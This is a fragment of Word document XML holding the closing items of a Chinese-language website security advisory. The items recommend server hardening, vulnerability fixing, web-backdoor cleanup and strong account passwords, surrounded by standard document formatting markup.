    <w:p w:rsidP="00EA311D" w:rsidR="007E34ED" w:rsidRDefault="00B64B4D" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E34ED" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>加强同IP的其他网站的安全防护，否则还可能存在通过其他网站的安全风险进行入侵网站服务器；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00B64B4D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B64B4D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>加固网站服务器安全：加强网站服务器的日常维护，做好网站服务器的访问控制，限定开放访问IP白名单、限定开放高危端口/服务、定期对网站服务器进行安全体检、及时消除可能存在的安全隐患；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00B64B4D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B64B4D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>加强网站弱点修复：定期对网站开展安全风险评估，及时消除网站的漏洞风险，提升网站本身的安全性；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00B64B4D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B64B4D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>及时清理网页后门：网站发布、升级、迁移前和日常运</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>维过程</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中都要对网站源文件进行网页后门扫描和彻底清理；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00E4426F" w:rsidRDefault="007E34ED" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00B64B4D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B64B4D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>加强管理账号管理：加强对网站管理后台账号、FTP/SSH/VNC/远程桌面等远程维护工具账号的管理，尽可能使用强密码，并保证定期更换新密码。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E4426F" w:rsidRPr="00EA311D">
      <w:footerReference r:id="rId8" w:type="default"/>
      <w:pgSz w:h="16838" w:w="11906"/>
      <w:pgMar w:bottom="1440" w:footer="992" w:gutter="0" w:header="851" w:left="1800" w:right="1800" w:top="1440"/>
      <w:cols w:space="425"/>
      <w:docGrid w:linePitch="312" w:type="line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57F9" w:rsidRDefault="008F57F9" w:rsidP="008317DA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008F57F9" w:rsidRDefault="008F57F9" w:rsidP="00831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icrosoftYaHei">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="MicrosoftYaHei-Bold">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C531A2" w:rsidRDefault="00C531A2">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor allowOverlap="1" behindDoc="0" distB="0" distL="114300" distR="114300" distT="0" layoutInCell="1" locked="0" relativeHeight="251659264" simplePos="0" wp14:anchorId="0FA1CDFB" wp14:editId="4D67D7AC">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-23495</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5257800" cy="0"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="54" name="直接连接符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ln>
                      <a:effectLst/>
                    </wps:spPr>
                    <wps:bodyPr/>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:line from="0,-1.85pt" id="直接连接符 5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Z8uS1AEAAGwDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8GO0zAQvSPxD5bvNGlFYYma7qGr5bJA pV0+YOo4jYXtsWy3SX+CH0DiBieO3Pkbls9g7DZlgRsih1HsmXkz7814cTkYzfbSB4W25tNJyZm0 AhtltzV/e3f95IKzEME2oNHKmh9k4JfLx48WvavkDDvUjfSMQGyoelfzLkZXFUUQnTQQJuikJWeL 3kCko98WjYee0I0uZmX5rOjRN86jkCHQ7dXRyZcZv22liG/aNsjIdM2pt5itz3aTbLFcQLX14Dol Tm3AP3RhQFkqeoa6gghs59VfUEYJjwHbOBFoCmxbJWTmQGym5R9sbjtwMnMhcYI7yxT+H6x4vV97 ppqaz59yZsHQjO4/fP3+/tOPbx/J3n/5zMhDMvUuVBS9smufiIrB3robFO8Cs7jqwG5lbvfu4Ahi mjKK31LSITgqtulfYUMxsIuYNRtabxIkqcGGPJrDeTRyiEzQ5Xw2f35R0gTF6CugGhOdD/GlRMPS T821skk1qGB/E2JqBKoxJF1bvFZa58lry/qavyD0nBBQqyY5U1jw281Ke7aHtDv5y6zI8zDM4842 xyLapjyZ1+5UeWR91G+DzWHtR2lopLm30/qlnXl4zgL+eiTLnwAAAP//AwBQSwMEFAAGAAgAAAAh AKoHUHzaAAAABgEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SFyq1iGVIErjVAjI jQstiOs23iYR8TqN3Tbw9SziAMeZWc28LdaT69WJxtB5NnCzSEAR19523Bh43VbzDFSIyBZ7z2Tg kwKsy8uLAnPrz/xCp01slJRwyNFAG+OQax3qlhyGhR+IJdv70WEUOTbajniWctfrNElutcOOZaHF gR5aqj82R2cgVG90qL5m9Sx5Xzae0sPj8xMac3013a9ARZri3zH84As6lMK080e2QfUG5JFoYL68 AyVplmZi7H4NXRb6P375DQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAA AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEA AAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMlny5LUAQAAbAMA AA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAKoHUHzaAAAA BgEAAA8AAAAAAAAAAAAAAAAALgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAA1BQAA AAA= "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to="414pt,-1.85pt" w14:anchorId="63A8B9BB"/>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor allowOverlap="1" behindDoc="0" distB="0" distL="114300" distR="114300" distT="0" layoutInCell="1" locked="0" relativeHeight="251660288" simplePos="0" wp14:anchorId="23C9B1E2" wp14:editId="0BBA011F">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>3070225</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5257800" cy="0"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="55" name="直接连接符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ln>
                      <a:effectLst/>
                    </wps:spPr>
                    <wps:bodyPr/>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:line from="0,241.75pt" id="直接连接符 5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m17p1AEAAGwDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8GO0zAQvSPxD5bvNGmlwhI13UNXy2WB Srt8wNR2EgvHY9lu0/4EP4DEDU4cufM3u3wGY7cpC9wQOYxiz8ybeW/Gi8t9b9hO+aDR1nw6KTlT VqDUtq35u7vrZxechQhWgkGran5QgV8unz5ZDK5SM+zQSOUZgdhQDa7mXYyuKoogOtVDmKBTlpwN +h4iHX1bSA8DofemmJXl82JAL51HoUKg26ujky8zftMoEd82TVCRmZpTbzFbn+0m2WK5gKr14Dot Tm3AP3TRg7ZU9Ax1BRHY1uu/oHotPAZs4kRgX2DTaKEyB2IzLf9gc9uBU5kLiRPcWabw/2DFm93a My1rPp9zZqGnGT18/Hb/4fOP75/IPnz9wshDMg0uVBS9smufiIq9vXU3KN4HZnHVgW1Vbvfu4Ahi mjKK31LSITgqthleo6QY2EbMmu0b3ydIUoPt82gO59GofWSCLuez+YuLkiYoRl8B1ZjofIivFPYs /dTcaJtUgwp2NyGmRqAaQ9K1xWttTJ68sWyo+UtCzwkBjZbJmcKCbzcr49kO0u7kL7Miz+Mwj1sr j0WMTXkqr92p8sj6qN8G5WHtR2lopLm30/qlnXl8zgL+eiTLnwAAAP//AwBQSwMEFAAGAAgAAAAh AN17dI/bAAAACAEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwUtpN6ZaQsymiJqb F6vidZodk2B2Ns1u2+ivd4SCHue9x5vvFevJ9epAY+g8G7haJKCIa287bgy8vlTzDFSIyBZ7z2Tg iwKsy/OzAnPrj/xMh01slJRwyNFAG+OQax3qlhyGhR+Ixfvwo8Mo59hoO+JRyl2v0yRZaYcdy4cW B7pvqf7c7J2BUL3Rrvqe1bPkfdl4SncPT49ozOXFdHcLKtIU/8Lwiy/oUArT1u/ZBtUbkCHRwHW2 vAEldpZmomxPii4L/X9A+QMAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDim17p1AEAAGwD AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDde3SP2wAA AAgBAAAPAAAAAAAAAAAAAAAAAC4EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAANgUA AAAA "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to="414pt,241.75pt" w14:anchorId="00E80E48"/>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>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8317DA" w:rsidR="008F57F9" w:rsidRDefault="008F57F9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="0" w:type="continuationSeparator">
    <w:p w:rsidP="008317DA" w:rsidR="008F57F9" w:rsidRDefault="008F57F9">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4FD43385"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FF6930A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="720" w:left="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="1080" w:left="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="1440" w:left="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="1440" w:left="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="1800" w:left="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="2160" w:left="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="2520" w:left="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="2880" w:left="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="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bordersDoNotSurroundHeader/>
  <w:bordersDoNotSurroundFooter/>
  <w:proofState w:grammar="clean" w:spelling="clean"/>
  <w:defaultTabStop w:val="420"/>
  <w:drawingGridVerticalSpacing w:val="156"/>
  <w:displayHorizontalDrawingGridEvery w:val="0"/>
  <w:displayVerticalDrawingGridEvery w:val="2"/>
  <w:characterSpacingControl w:val="compressPunctuation"/>
  <w:hdrShapeDefaults>
    <o:shapedefaults spidmax="2049" v:ext="edi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26F"/>
    <w:rsid w:val="00004C4B"/>
    <w:rsid w:val="00053B57"/>
    <w:rsid w:val="00091364"/>
    <w:rsid w:val="00091C10"/>
    <w:rsid w:val="000C14ED"/>
    <w:rsid w:val="000C3BA4"/>
    <w:rsid w:val="000D6094"/>
    <w:rsid w:val="001061F7"/>
    <w:rsid w:val="00125681"/>
    <w:rsid w:val="001275FC"/>
    <w:rsid w:val="00180F79"/>
    <w:rsid w:val="00184809"/>
    <w:rsid w:val="00190424"/>
    <w:rsid w:val="00190481"/>
    <w:rsid w:val="001E04E4"/>
    <w:rsid w:val="0020327D"/>
    <w:rsid w:val="00215566"/>
    <w:rsid w:val="00236417"/>
    <w:rsid w:val="002625B3"/>
    <w:rsid w:val="00272AF5"/>
    <w:rsid w:val="002744CF"/>
    <w:rsid w:val="002B1217"/>
    <w:rsid w:val="002C3461"/>
    <w:rsid w:val="002C69AE"/>
    <w:rsid w:val="00306A11"/>
    <w:rsid w:val="00384983"/>
    <w:rsid w:val="003A0057"/>
    <w:rsid w:val="003C00F4"/>
    <w:rsid w:val="003C7346"/>
    <w:rsid w:val="00401D4E"/>
    <w:rsid w:val="00404726"/>
    <w:rsid w:val="004544EE"/>
    <w:rsid w:val="004B0CF5"/>
    <w:rsid w:val="004D2971"/>
    <w:rsid w:val="004D68F1"/>
    <w:rsid w:val="004D76AB"/>
    <w:rsid w:val="004F16C1"/>
    <w:rsid w:val="004F1CE2"/>
    <w:rsid w:val="0050417D"/>
    <w:rsid w:val="00510B9F"/>
    <w:rsid w:val="005246E8"/>
    <w:rsid w:val="005379B7"/>
    <w:rsid w:val="0056366D"/>
    <w:rsid w:val="005C1FD9"/>
    <w:rsid w:val="00602E4C"/>
    <w:rsid w:val="0063409B"/>
    <w:rsid w:val="00647268"/>
    <w:rsid w:val="006B5F5F"/>
    <w:rsid w:val="007159E2"/>
    <w:rsid w:val="0074232F"/>
    <w:rsid w:val="00744AAC"/>
    <w:rsid w:val="00766853"/>
    <w:rsid w:val="0079647F"/>
    <w:rsid w:val="007973D6"/>
    <w:rsid w:val="007E34ED"/>
    <w:rsid w:val="00807F53"/>
    <w:rsid w:val="008160AF"/>
    <w:rsid w:val="008317DA"/>
    <w:rsid w:val="00847E6E"/>
    <w:rsid w:val="0086311C"/>
    <w:rsid w:val="008707D5"/>
    <w:rsid w:val="008A47BD"/>
    <w:rsid w:val="008D51B2"/>
    <w:rsid w:val="008F57F9"/>
    <w:rsid w:val="0093129D"/>
    <w:rsid w:val="00980B78"/>
    <w:rsid w:val="00985221"/>
    <w:rsid w:val="0099428D"/>
    <w:rsid w:val="00A00A32"/>
    <w:rsid w:val="00A206B9"/>
    <w:rsid w:val="00A2111A"/>
    <w:rsid w:val="00A43013"/>
    <w:rsid w:val="00A714BD"/>
    <w:rsid w:val="00A775C1"/>
    <w:rsid w:val="00AC3AB0"/>
    <w:rsid w:val="00B02D12"/>
    <w:rsid w:val="00B22C0B"/>
    <w:rsid w:val="00B26EE9"/>
    <w:rsid w:val="00B64B4D"/>
    <w:rsid w:val="00B91537"/>
    <w:rsid w:val="00BE7B59"/>
    <w:rsid w:val="00BF1A34"/>
    <w:rsid w:val="00C46994"/>
    <w:rsid w:val="00C531A2"/>
    <w:rsid w:val="00C82032"/>
    <w:rsid w:val="00CA61C8"/>
    <w:rsid w:val="00CC70E7"/>
    <w:rsid w:val="00CF221C"/>
    <w:rsid w:val="00CF7283"/>
    <w:rsid w:val="00D10C5B"/>
    <w:rsid w:val="00D215C8"/>
    <w:rsid w:val="00D61B44"/>
    <w:rsid w:val="00D66F1B"/>
    <w:rsid w:val="00D96623"/>
    <w:rsid w:val="00DC0775"/>
    <w:rsid w:val="00DD47B1"/>
    <w:rsid w:val="00DD5884"/>
    <w:rsid w:val="00E0777A"/>
    <w:rsid w:val="00E1765C"/>
    <w:rsid w:val="00E33FA1"/>
    <w:rsid w:val="00E4426F"/>
    <w:rsid w:val="00E64748"/>
    <w:rsid w:val="00E92B51"/>
    <w:rsid w:val="00E967D3"/>
    <w:rsid w:val="00EA311D"/>
    <w:rsid w:val="00EB36A7"/>
    <w:rsid w:val="00EE20C0"/>
    <w:rsid w:val="00EE305A"/>
    <w:rsid w:val="00F363CC"/>
    <w:rsid w:val="00F61D2F"/>
    <w:rsid w:val="00F917C4"/>
    <w:rsid w:val="00F96FBD"/>
    <w:rsid w:val="00FF7A89"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef/>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5:chartTrackingRefBased/>
